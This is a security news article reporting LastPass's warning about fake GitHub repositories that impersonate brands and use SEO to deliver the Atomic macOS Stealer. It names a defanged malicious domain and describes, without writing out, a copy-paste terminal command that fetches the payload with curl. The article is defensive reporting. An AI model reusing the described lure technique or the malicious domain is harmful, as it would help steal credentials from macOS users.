Threat actors are impersonating known brands in an ongoing, widespread campaign aimed at infecting macOS users with information stealer malware, LastPass warns.
As part of the infection chain, the hackers are relying on fraudulent GitHub repositories claiming to provide macOS software from various companies and use search engine optimization (SEO) so that links to the repositories appear at the top of search pages.
“In the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware,” LastPass says.
LastPass identified two GitHub sites impersonating its brand, which were posted on the Microsoft-owned code-sharing platform on 16 September, and which have been taken down since.
Both were posted by a user named ‘modhopmduck476’ and contained links claiming to enable users to install ‘LastPass on MacBook’, but redirected to the same malicious page.
A page claiming to offer ‘LastPass Premium on MacBook’ was redirecting to macprograms-pro[.]com, where users were instructed to copy and paste a command into a terminal window.
The command initiates a CURL request to an encoded URL, resulting in an ‘Update’ payload being downloaded to the Temp directory.
The payload was the Atomic macOS Stealer (AMOS) infostealer, which has been used in numerous attacks since 2023. In August, CrowdStrike warned of an increase in fraudulent advertisements delivering a variant of AMOS called SHAMOS.
LastPass has observed the threat actors impersonating financial institutions, password managers, technology companies, AI tools, cryptocurrency wallets, and other businesses.
To evade detection, the threat actors used multiple GitHub usernames to create other fake GitHub pages, which followed a similar naming pattern, where the name of the targeted company and Mac-related terminology were used.
The campaign observed by LastPass has been ongoing since at least July, when Deriv security researcher Dhiraj Mishra warned that Homebrew users were targeted with malicious ads leading to a fake GitHub repository.
The attacks, Mishra pointed out, exploited users’ trust in Google Ads and GitHub, and installed the official Homebrew application to hide the execution of a malicious payload in the background.
Related: Telegram Rivaling Tor as Home to Criminal ‘Forums’
Related: Apple, Netflix, Microsoft Sites ‘Hacked’ for Tech Support Scams
Related: Apple Rolls Out iOS 26, macOS Tahoe 26 With Patches for Over 50 Vulnerabilities
Related: Apple Sends Fresh Wave of Spyware Notifications to French Users
